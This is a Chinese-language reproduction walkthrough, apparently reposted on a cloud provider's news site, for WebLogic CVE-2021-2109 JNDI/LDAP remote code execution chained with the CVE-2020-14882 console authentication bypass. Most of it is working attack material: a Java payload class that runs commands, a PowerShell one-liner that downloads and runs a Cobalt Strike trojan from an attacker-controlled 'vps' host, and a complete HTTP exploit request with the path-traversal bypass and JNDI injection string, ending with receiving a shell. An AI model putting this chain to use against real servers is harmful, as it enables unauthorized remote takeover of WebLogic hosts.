您好,登錄后才能下訂單哦!
本篇文章給大家分享的是有關weblogic CVE-2021-2109ldap遠程代碼執行漏洞的復現是怎樣的,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
參考:
https://blog.csdn.net/zhlh_xt/article/details/76436807
下載鏈接:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html
開始安裝:
| Java -D64 -jar wls1036_generic.jar |
| C:\Oracle\Middleware\user_projects\domains |
設置密碼
搭建完畢
訪問目標:
準備工作:
ldap包下載 https://github.com/RandomRobbieBF/marshalsec-jar/archive/master.zip
構造java包進行編譯:Request.java
| import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Request{ public Request() throws Exception { Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is)); String line; while((line = reader.readLine()) != null) { System.out.println(line); } p.waitFor(); is.close(); reader.close(); p.destroy(); } } |
如想上線CS把calc.exe修改為下載cs木馬并執行命令
cd ../../Windows/Temp && powershell (new-object System.Net.WebClient).DownloadFile('http://vps/123.jpg','evil.exe') & evil.exe
進行編譯:注意目標環境是什么jdk就用什么jdk版本進行編譯
編譯好class包后上傳到vps
開啟http服務,下面放編譯好的class包
用下載好的marshalsec包開啟ldap服務:
通過burp請求:配合
CVE-2021-2109(ldap遠程代碼執行)和CVE-2020-14882(未授權訪問)
完整數據包:
| POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1 Host: 192.168.48.203:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 X-Forwarded-For: 127.0.0.2 Content-Length: 163 Content-Type: application/x-www-form-urlencoded
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22;ldap://vps:5005/Request;AdminServer%22) |
cs接收shell
限制條件:目標可以出網,能夠成功構造和發送包
以上就是weblogic CVE-2021-2109ldap遠程代碼執行漏洞的復現是怎樣的,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。